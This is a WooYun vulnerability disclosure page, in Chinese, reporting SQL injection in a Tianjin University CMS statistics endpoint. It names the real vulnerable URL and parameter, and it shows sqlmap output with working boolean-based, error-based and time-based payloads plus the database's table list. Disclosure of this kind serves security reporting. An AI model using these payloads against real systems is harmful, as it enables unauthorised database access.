当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155339

漏洞标题:天津大学某处SQL注入漏洞(root权限)

相关厂商:tju.edu.cn

漏洞作者: 路人甲

提交时间:2015-11-23 19:27

修复时间:2015-11-28 19:28

公开时间:2015-11-28 19:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://cs973.tju.edu.cn/cmsstat/count?1=1&articleId=1&columnId=4028817a3c03fc4a013c09fe2039002b&time=1448243322946

31.png

45.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: articleId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: 1=1&articleId=1' AND 7571=7571 AND 'xhJY'='xhJY&columnId=4028817a3c03fc4a013c09fe2039002b&time=1448243322946
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: 1=1&articleId=1' AND (SELECT 2588 FROM(SELECT COUNT(*),CONCAT(0x71626b7671,(SELECT (ELT(2588=2588,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sVZQ'='sVZQ&columnId=4028817a3c03fc4a013c09fe2039002b&time=1448243322946
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: 1=1&articleId=1' AND (SELECT * FROM (SELECT(SLEEP(5)))AhGg) AND 'uVPB'='uVPB&columnId=4028817a3c03fc4a013c09fe2039002b&time=1448243322946
---
web application technology: Apache, JSP
back-end DBMS: MySQL 5.0
Database: cms_tdjsjxy_dev
[56 tables]
+---------------------------+
| qrtz_blob_triggers        |
| qrtz_calendars            |
| qrtz_cron_triggers        |
| qrtz_fired_triggers       |
| qrtz_job_details          |
| qrtz_job_listeners        |
| qrtz_locks                |
| qrtz_paused_trigger_grps  |
| qrtz_scheduler_state      |
| qrtz_simple_triggers      |
| qrtz_trigger_listeners    |
| qrtz_triggers             |
| t_ad                      |
| t_ad_page                 |
| t_bbs_reply               |
| t_bbs_subject             |
| t_bbs_user                |
| t_cms_article             |
| t_cms_article_recommend   |
| t_cms_base_page           |
| t_cms_base_panel          |
| t_cms_base_site_templet   |
| t_cms_catalog             |
| t_cms_catalog_crawl       |
| t_cms_frame               |
| t_cms_page                |
| t_cms_panel               |
| t_cms_rss                 |
| t_cms_rule                |
| t_cms_seo                 |
| t_cms_site                |
| t_cms_site_version_backup |
| t_cms_stat                |
| t_cms_style               |
| t_cms_templet             |
| t_db_bak                  |
| t_email                   |
| t_file_upload             |
| t_guest_book              |
| t_link                    |
| t_login_log               |
| t_menu                    |
| t_menu_role               |
| t_org                     |
| t_publish                 |
| t_research                |
| t_resource_article        |
| t_resource_file           |
| t_resource_fold           |
| t_role                    |
| t_survey                  |
| t_survey_option           |
| t_survey_subject          |
| t_sys_dic                 |
| t_user_role               |
| t_users                   |
+---------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-28 19:28

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无